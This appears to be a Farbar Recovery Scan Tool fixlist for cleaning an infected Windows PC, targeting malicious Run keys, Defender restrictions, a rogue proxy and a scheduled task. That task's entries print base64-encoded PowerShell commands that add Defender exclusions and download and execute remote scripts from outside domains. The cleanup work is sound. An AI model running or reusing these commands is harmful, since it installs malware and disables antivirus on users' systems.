CloseProcesses:
SystemRestore: On
CreateRestorePoint:
HKLM\...\Run: [hrvbs] => c:\windows\h.vbs [92 2025-12-17] () [File not signed]
HKLM\...\Policies\Explorer: [SettingsPageVisibility] hide:network-proxy <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe  (No File)
Task: {6DF52669-C418-4948-AD08-5C9167C6B131} - System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8 => Command(1): schtasks -> /run /tn \SystemResourcesUpdaterLegacy-g76sn8 <==== ATTENTION
Task: {6DF52669-C418-4948-AD08-5C9167C6B131} - System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8 => Command(2): powershell -> -NoProfile -EncodedCommand IwAgADUAMwBjADYAYQA2AGQAOQAtADIAOQBjAGMALQA0ADEAOABiAC0AYQAxADYAZQAtAGIAYQAyAGIAZAAxAGYAYgA2AGUAMgBmAAoAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACgARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBQAEkARAAgACQAUABJAEQAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBNAG8AZAB1AGwAZQBOAGEAbQBlACAALQBGAG8AcgBjAGUA <==== ATTENTION
Task: {6DF52669-C418-4948-AD08-5C9167C6B131} - System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8 => Command(3): powershell -> -NoProfile -EncodedCommand IwAgADEAYQBhADAAMQBlADMAYQAtADAANABhAGIALQA0ADYAZQA0AC0AYgBkADUANwAtAGIANQBiADgAYQA2ADYAMwBhAGYAZQBiAAoAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgARwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AKQAgAC0ARgBvAHIAYwBlAA== <==== ATTENTION
Task: {6DF52669-C418-4948-AD08-5C9167C6B131} - System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8 => Command(4): powershell -> -NoProfile -EncodedCommand IwAgADUAYwBmADYAYwBmADgAMAAtADkANwBiAGUALQA0ADcAZgA5AC0AYQBmADEANAAtADYAMABiADAAYQAwADkAMwA4ADMANgBiAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAGYAcgBlAHMAaABzAHQAbwBuAGUAcwAuAG8AcgBnACAAfAAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgA= <==== ATTENTION
Task: {6DF52669-C418-4948-AD08-5C9167C6B131} - System32\Tasks\SystemResourcesUpdaterLegacy-g76sn8 => Command(5): powershell -> -NoProfile -EncodedCommand IwAgAGEAMgAxADcAYgBiAGEAMAAtADIAZAA0ADYALQA0ADUAYgBhAC0AYgA4ADUANAAtAGYAYwA2ADkAMABhADcAZABiADIAOAAzAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAHEAdQBpAGUAdABzAGcAYQByAGQAZQBuAHMALgBjAG8AbQAgAHwAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4A <==== ATTENTION
ManualProxies: 1127.0.0.1:58128 <==== ATTENTION
HKU\S-1-5-21-805122580-2970808790-2044927905-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
DisableService: AdvancedSystemCareService19
S3 cpuz154; \??\C:\WINDOWS\temp\cpuz154\cpuz154_x64.sys [X] <==== ATTENTION
ContextMenuHandlers1_S-1-5-21-805122580-2970808790-2044927905-1001: [          kwpsshellext] -> {28A80003-18FD-411D-B0A3-3C81F618E22B} => C:\Users\Admin\AppData\Local\Kingsoft\WPS Office\11.2.0.11042\office6\kwpsmenushellext64.dll -> No File
ContextMenuHandlers4_S-1-5-21-805122580-2970808790-2044927905-1001: [          kwpsshellext] -> {28A80003-18FD-411D-B0A3-3C81F618E22B} => C:\Users\Admin\AppData\Local\Kingsoft\WPS Office\11.2.0.11042\office6\kwpsmenushellext64.dll -> No File
FirewallRules: [{a019d323-5ec6-44ab-a0e1-0022e742d03e}] => (Allow) C:\Users\Admin\1\Microsoft_Entra_Password_Protection.exe => No File
FirewallRules: [{532d2282-458a-447a-9f0a-8cb154ee51c2}] => (Allow) C:\Users\1\Microsoft_Entra_Password_Protection.exe => No File
Reboot: